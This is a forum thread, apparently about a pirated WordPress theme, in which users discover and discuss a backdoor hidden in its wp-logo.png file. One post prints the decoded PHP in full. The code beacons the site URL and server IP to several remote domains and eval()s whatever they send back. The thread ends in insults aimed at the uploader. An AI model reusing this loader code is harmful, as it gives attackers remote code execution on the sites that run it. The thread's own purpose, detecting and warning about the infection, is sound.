Search

***SArena*** · (This post was last modified: 06-17-2014 12:23 PM by SArena.)

(06-17-2014 12:16 PM)iapetos Wrote: It is indeed infected, and poorly at that. Kids are just getting lazy now.

its not infected its a purchased theme. TF authors started to use base64 in there themes and all this stuff.

***iapetos*** · (This post was last modified: 06-17-2014 12:33 PM by iapetos.)

try {
$serverUrl = array(
"96wn.com/transit.php",
"64tj.com/transit.php",
"ugo3.com/transit.php",
);

$domainPackVersion = 1;
if(array_key_exists('SERVER_ADDR', $_SERVER))
$ip = $_SERVER['SERVER_ADDR'];
elseif(array_key_exists('LOCAL_ADDR', $_SERVER))
$ip = $_SERVER['LOCAL_ADDR'];
elseif(array_key_exists('SERVER_NAME', $_SERVER))
$ip = gethostbyname($_SERVER['SERVER_NAME']);
else {
if(stristr(PHP_OS, 'WIN')) {
$ip = gethostbyname(php_uname("n"));
} else {
$ifconfig = shell_exec('/sbin/ifconfig eth0');
preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
$ip = $match[1];
}
}
$currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
$data = array(
"url" => $currentUrl,
"ip" => $ip,
"domainPackVersion" => $domainPackVersion,
"failedDomains" => array(),
);
$failedRequest = true;
$failCounter = 0;
$sockSuccess = false;
$urlKey = rand(0, count($serverUrl)-1);
$subDomain = rand(0, 10);
while (!$sockSuccess) {
$result = "";
$url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
$host = $url["host"];
$path = (!empty($url["path"])) ? $url["path"] : '';
$fp = fsockopen($host, 80, $errno, $errstr, 1);
$dataQuery=http_build_query($data);
if($fp){
fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
fputs($fp, "Host: $host".PHP_EOL);
fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
fputs($fp, $dataQuery);
while(!feof($fp)) $result .= fgets($fp, 128);
$code = substr($result,9,3);
fclose($fp);
if (is_numeric($code) and& $code==="200") {
break;
}
}
if ($failedRequest) {
$failCounter++;
$data['failedDomains'][] = $serverUrl[$urlKey];
array_splice($serverUrl,$urlKey, 1);
if (!empty($serverUrl) and& $failCounter<2)
{
$subDomain = rand(0, 10);
$urlKey = rand(0, count($serverUrl)-1);
}
else
break;
}
}
if (!empty($result) and& strpos($result, 'result=')!==false)
{
$temp = explode('result=', $result, 2);
if(isset($temp[1])){
@eval($temp[1]);
}
}
} catch (Exception $e) {

}

I really doubt Envato, who is out of Australia and never uses private whois, suddenly decided to insert this code with ties to a private registration out of Panama.

***fsnsh6*** · 06-17-2014, 12:37 PM

the function.php code
line 139

if(get_option('wpb_js_templates',"")==""){
$saved=wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt');
$import_code = base64_decode($saved['body']);
update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' );

has base64_decoded
i also need some expert advise, is this safe?
thanks

***iapetos*** · 06-17-2014, 12:43 PM

That function just imports the demo content. That part is ok. However the part I posted is a infection disguised as the wp-logo.png file.

***fsnsh6*** · 06-17-2014, 12:48 PM

thanks iapetos for advise

virustotal scan show 1 treat

https://www.virustotal.com/ro/file/ef130.../analysis/

Detection ratio: 1 / 53

***fsnsh6*** · 06-17-2014, 12:57 PM

hope this help other user
step to detect
open wp-logo.png with notepad++
copy entire code to paste on http://ddecode.com/phpdecoder/
and get the code as post 12
iapetos
conclusion for sure it is not safe

***cabaniss34*** · (This post was last modified: 06-17-2014 01:14 PM by cabaniss34.)

someone please post a clean version or do we just remove the image in the documentation than it should be fine correct ???

(06-17-2014 12:57 PM)fsnsh6 Wrote:
Just clean it and then post it !!!
hope this help other user
step to detect
open wp-logo.png with notepad++
copy entire code to paste on http://ddecode.com/phpdecoder/
and get the code as post 12
iapetos
conclusion for sure it is not safe

***Batmans*** · (This post was last modified: 06-17-2014 01:40 PM by Batmans.)

Sarena. How is this script purchased and infected at the same time? IF this is the case then you need your sorry *SS banned and kicked. So which is it?

***SArena*** · (This post was last modified: 06-17-2014 02:18 PM by SArena.)

don't be rude. not my purchased i only posted what has been posted on a site. if it was my purchased i would say so. you can see all my other files i posted all purchased by me. this was not mine it was a unique theme and i posted it from a site.

***Batmans*** · 06-17-2014, 01:51 PM

IF you did not purchase it then it should NOT say....

[GET] ThemeForest - PRO Business - Responsive Multi-Purpose Theme [PURCHASED]

Implying that YOU purchased it you lying piece of *hit! Don't say you purchased it and miss lead members into thinking this is a legit post when your sorry lying a** knows good and well you infected it. *****. Take that shit somewhere else.